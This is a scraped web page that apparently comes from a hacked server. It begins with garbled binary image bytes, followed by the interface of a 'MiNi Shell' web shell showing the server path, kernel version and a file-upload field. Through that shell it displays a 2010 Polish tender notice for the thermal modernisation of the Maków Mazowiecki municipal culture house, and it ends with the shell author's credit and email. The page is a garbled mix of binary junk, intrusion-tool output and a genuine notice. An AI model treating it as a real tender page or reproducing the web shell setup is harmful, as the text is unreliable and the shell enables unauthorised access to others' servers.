JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100630/171709-N-2010.html

<p class="kh_header"><b>Maków Mazowiecki: Termomodernizacja  budynku Miejskiego Domu Kultury w Makowie Mazowieckim</b><br>
<b>Numer ogłoszenia: 171709 - 2010; data zamieszczenia: 30.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Dom Kultury , ul. Stanisława Moniuszki 2, 06-200 Maków Mazowiecki, woj. mazowieckie, tel. 0-297171272, faks 0-29 7171272.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja  budynku Miejskiego Domu Kultury w Makowie Mazowieckim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
Termomodernizacja  budynku Miejskiego Domu Kultury w Makowie Mazowieckim
remontu budynku obejmuje:
	
OPIS ROBÓT PROJEKTOWYCH 
Prace demontażowe: 
Elewacje: 
-	zdemontować obudowę zejścia do piwnicy;
-	zdemontować instalacje, kraty, tablice informacyjne i oznaczeniowe, wsporniki do flag z elewacji;  
-	zdemontować okna wg rysunków stolarki okiennej oraz (wg stolarki okiennej);
-	zdemontować izolację z supremy ze ścian;
-	skuć luźne warstwy  tynków ze ścian, gzymsów, podestów;
-	zdemontować obróbki blacharskie. 
Elementy dachu: 
-	zdjąć warstwy izolacyjne stropodachu wraz z  obróbką blach przy krawędziach  dachu, 
Schody, podesty i podjazdy zewnętrzne: 
-	skuć lastrykowe okładziny ze schodów
Prace projektowe: 
Elewacje: 
Ściany zewnętrzne. 
Przygotować całą powierzchnię ścian zewnętrznych przez: 
-	usunięcie luźnych i zwietrzałych warstw tynku, 
-	ubytki i nierówności wyrównać tynkiem cementowo wapiennym. 
W części cokołowej: 
-	wszelkie ubytki i nierówności zagruntować i uzupełnić  zaprawą np. WTA Vospritz. 
-	tynkować tynkiem podkładowym np. WTA Porengrundputz. 
-	tynk renowacyjny np. WTA Sanierputz Rapid. 
Po wykonaniu prac przygotowawczych przystąpić do przytwierdzania płyt styropianowych klasy FS-15 na całości ścian zewnętrznych : 
-	Ściany zewnętrzne styropianem -gr. 12cm. 
-	Ściany zewnętrzne - pas przy dachu styropianem -gr. 15cm. 
-	W ościeżach okien i drzwi mocować styropian- gr. 2cm. 
-	Cokół budynku styropian ekstrudowany - gr. 8 cm. 
Styropian mocować przy pomocy zaprawy klejącej do izolacji termicznej wchodzącej w skład systemu ociepleń np. CAPATEC firmy Caparol. 
Po wstępnym związaniu zaprawy (ok. 24 godzin) mocować płyty dodatkowo przy pomocy łączników mechanicznych w ilości 4 -6 szt na m2.  
Styropian w ościeżach zamontować nie zmniejszając powierzchni okien ani drzwi. 
Powierzchnię izolacji wyrównać przez ścieranie, przy pomocy pacy z papierem ściernym.  
Uniwersalną zaprawą klejowo-szpachlową zaszpachlować łby kołków oraz przy narożach otworów okiennych i drzwiowych wkleić wzmocnienia z siatki szklanej (kawałki 20 X 30 cm) pod kątem 45°.  
Na tak przygotowaną warstwę izolacji nakładać warstwę uniwersalnej zaprawy klejowo-szpachlowej przy pomocy pacy stalowej lub mechanicznie, z jednoczesnym wtapianiem w nią siatki z włókna szklanego. Na części cokołowej należy wtopić dodatkową warstwę siatki, lub zastosować siatkę w odmianie pancer.  
Wszystkie narożniki przy drzwiach balkonowych oraz naroża ścian na parterze budynku, dodatkowo wzmocnić kątownikami aluminiowymi 50/120 (25 X 25 mm). Na wyschniętą wyprawę zbrojącą, należy nanieść warstwę zaprawy w celu całkowitego pokrycia siatki i wyrównania powierzchni wyprawy. Na całkowicie wyschniętą wyprawę zbrojącą nanosić ręcznie przy pomocy wałka lub natryskowo  warstwę podkładu gruntującego  podkład.  
Po wyschnięciu podkładu gruntującego nakładać ręcznie warstwę elewacyjną wyprawy z tynku akrylowego  Capatect. Tynk należy zacierać poziomo, nadając drobną strukturę typu kasza o granulacji do ok. 1,5 mm. 
 
Zastosować tynk akrylowy  w kolorach: 
-1 -  S7020-Y40R - cokół  
- 2 - S1020-G50Y - ściany 
- 3 - S1030-G30Y - ściany w strefie przydachowej  
 
W części cokołowej budynku stosować tynk mozaikowy .
Stropodach. 
Stropodach ocieplić płytami styropianowymi EPS 100 laminowanymi jednostronnie  
papą (gr styropianu 10+10cm) następnie pokryć dach papą termozgrzewalną wierzchniego krycja gr. 5 mm. Np. SBS ICOPAL. 
Istniejące koryta odpływowe w dachu wypełnić styropian  w miejscach ich występowania zastosować koryta wykonane z blachy lub systemowe z łagodnymi łukami wygięć.  
Przed wykonaniem pokrycia z papy termozgrzewalnej, należy przykleić dodatkowe paski papy (szer. 50 cm) na łączeniu koryt odpływowych i izolacji termicznej. 
Całość pokryć papą termozgrzewalną łącznie z zagłębioną powierzchnią koryt. 
W dachu zamontować nowe wpusty dachowe z dokładnym uszczelnieniem odpływów pod stropem. 
Na dachu podnieść wszystkie podstawy dachowe pod istniejące wywietrzaki i wentylatory dachowe. 
W miejscach gdzie będzie konieczne podniesienie ścianki attykowej, wymurować nową ściankę. Przy krawędzi ułożyć kliny ze styropianu laminowanego papą. 
Wykonać obróbki blacharskie z blachy powlekanej. 
Okna:  
Okna z PCV o współczynniku przenikania mniejszym niż U=1.3W/m2K, uchylne, rozwierane. wg rysunku wykazu stolarki okiennej Parapety zewnętrzne wykonać z blachy malowanej proszkowo Parapety wewnętrzne z konglomeratów kamiennych.  
Drzwi: 
Drzwi zewnętrzne wymienić wg. rysunku wykazu stolarki drzwiowej. 
Daszki nad wejściami: 
Nad wejściami do budynku w miejscach przewidzianych w dokumentacji projektowej montować daszki systemowe szklane na konstrukcji metalowej kotwionej do ściany budynku. 
Obudowa zejścia do piwnicy: 
Na murku obudowy schodów do piwnicy wykonać obudowę: 
Ściany od zewnątrz: 
-  tynk akrylowy na siatce 
-  styropian gr. 12 cm 
-  płyta OSB gr. 20 mm 
-  lekka konstrukcja z metalowych profili zamkniętych  
Dach od zewnątrz: 
-  płyta poliwęglanowa dwukomorowa przykręcana do konstrukcji metalowej 
-  lekka konstrukcja z metalowych profili zamkniętych. 
 
Osłona śmietnika: 
Zabudować istniejącą obudowę na elewacji południowej dachem przekrytym blachą powlekaną na lekkiej konstrukcji z metalowych profili zamkniętych. Przestrzeń pomiędzy dachem a ścianami zabudować siatka stalową, zamontować drzwi stalowe wypełnione siatką z zamkiem na klucz. Ściany od zewnątrz wykończone jak elewacja budynku. 
Balustrady: 
Montować nowe balustrady o wysokości 110 cm w miejscach przedstawionych w dokumentacji projektowej. 
Oświetlenie zewnętrzne:
W miejscach pokazanych na projekcie zamontować lampy halogenowe wykorzystując instalacje elektryczna obecnych opraw żarowych. Lampy halogenowe mocować wyżej od istniejących opraw. Lampy halogenowe wyposażone w czujnik ruchu. 
Schody zewnętrzne, rampa i podjazdy: 
Na zewnętrznych powierzchniach schodów odtworzyć okładzinę z płukanego lastryka przez całkowite skucie istniejących okładzin i wykonanie nowych. Ubytki betonu uzupełnić po wcześniejszym dokładnym oczyszczeniu i zagruntowaniu masami naprawczymi do betonu. 
Podjazd dla niepełnosprawnych wzdłuż ulicy Mickiewicza należy poszerzyć i przedłużyć balustradę ze względu na zmniejszenie jego szerokości po dociepleniu ścian.  
Odprowadzenie wody opadowej: 
W celu właściwego odprowadzenia wody opadowej z dachów należy udrożnić ew. wymienić przykanaliki  i na nowo podłączyć odpływy z rur spustowych do studzienek kanalizacyjnych.  
Zagospodarowanie terenu:  
Nie przewiduje się powstania nowych elementów budowlanych wokół budynku, zamierzenia projektowe polegają jedynie na odnowieniu istniejących powierzchni schodów i podestów zewnętrznych.  
Przy elewacji frontowej należy wymienić zdewastowany chodnik z kostki betonowej, zastosować kostkę typu ARKO. 
We wjazdach zamontować uchylne słupki (motylki) na klucz. 
 
Wszystkie materiały stosowane do termomodernizacji budynku winny być zgodne z wymaganiami instrukcji ITB i posiadać odpowiednie certyfikaty i atesty potwierdzające, a wykonanie robót musi być zgodne z odpowiednimi normami. 

Dopuszcza się zastosowanie urządzeń, elementów i materiałów innych producentów pod warunkiem zapewnienia jakości, odpowiedniego poziomu technicznego oraz funkcjonalności nie mniejszej niż zaproponowane w uproszczonej dokumentacji technicznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.20.00.00-6, 45.26.00.00-7, 45.26.13.10-0, 45.42.10.00-4, 45.42.11.10-8, 45.42.11.40-7, 45.41.00.00-4, 45.44.21.00-8, 45.45.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 10.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi  wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - minimum 2 zadanie  o wartości nie mniejszej niż  200.000,00 zł. - zał. Nr 8 do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, że osoby pełniące  funkcje kierownicze w realizacji zamówienia  posiadają wymagane uprawnienia do kierowania robotami budowlanymi z aktualnym   zaświadczeniem o przynależności do izby Inżynierów Budownictwa na podstawie art. 14 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2006 r. Nr 156, poz. 1118, z późn. zm.) - zał. Nr 10 do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada  osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami -  dysponują co najmniej jedną osobą posiadającą uprawnienia budowlane w rozumieniu przepisów ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2006 r. Nr 207, poz. 2016, z późn. zm.) do kierowania robotami budowlanymi w specjalności ogólnobudowlanej   lub odpowiadającymi im uprawnieniami wydanymi na podstawie wcześniej obowiązujących przepisów, - zał. Nr 9 do siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże , że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum  200.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wzór ogólnych warunków umowy stanowi załącznik nr 5 do siwz.
2.	Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy.
3.	Zamawiający przyjmuje następujące kryteria dla zmiany umowy:
a.	termin realizacji robót ulega przedłużeniu w następujących sytuacjach:
-	w przypadku opóźnienia w przekazaniu placu budowy z winy zamawiającego,
-	w przypadku wad i braków dokumentacji projektowej lub innych dokumentów budowy o ile zamawiający zobowiązany jest do ich przekazania wykonawcy,
-	wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót,
-	wykopalisk lub innych przeszkód uniemożliwiających prowadzenie robót, za które nie odpowiada wykonawca i zamawiający,
-	zmiany dokumentacji projektowej,
-	zawieszenia robót przez zamawiającego nie z winy wykonawcy,
b.	wynagrodzenie wykonawcy określone w umowie może ulec zmianie w następujących przypadkach:
-	wykonania robót zamiennych i/lub dodatkowych, niezbędnych do wykonania przedmiotu umowy o wartość robot zamiennych i/lub dodatkowych, 
-	rezygnacji z części robót, jeśli rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy o wartość nie wykonanych robót,
-	zmiany stawki podatku VAT dla robót objętych przedmiotem zamówienia,
c.	inne zmiany:
-	możliwa jest zmiana umowy w zakresie podstawowego personelu wykonawcy i zamawiającego za uprzednią zgodą zamawiającego wyrażoną na piśmie,
-	możliwe są zmiany umowy polegające na zmianie jakości lub innych parametrów charakterystycznych  dla danego elementu robót lub zmiana technologii,
-	umowa może być zmieniona w zakresie kolejności i terminów wykonywania robót budowlanych wskazanych w harmonogramie,
-	umowa może być zmieniona w przypadku aktualizacji rozwiązań z uwagi na postęp techniczny, lub zmiany obowiązujących przepisów techniczno-budowlanych,
-	zmiana kierownika budowy, bądź inspektora nadzoru w przypadku: choroby, śmierci, rezygnacji, zwolnienia z pracy lub innych zdarzeń losowych.
2. Warunki dokonywania zmian:
a.	inicjowanie zmian może nastąpić na wniosek wykonawcy i zamawiającego,
b.	uzasadnienie zmian - obniżenie kosztów oraz zapewnienie optymalnych parametrów technicznych i jakościowych robót,
c.	zmiany umowy dokonuje się w formie pisemnego aneksu do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.makowmazowiecki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Dom Kultury 
w Makowie Mazowieckim
ul. Moniuszki 2
06-200 Maków Mazowiecki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2010 godzina 10:50, miejsce: Miejscem składania ofert jest Sekretariat  Miejskiego Domu Kultury, ul Moniuszki 2,  06-200 Maków Mazowiecki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com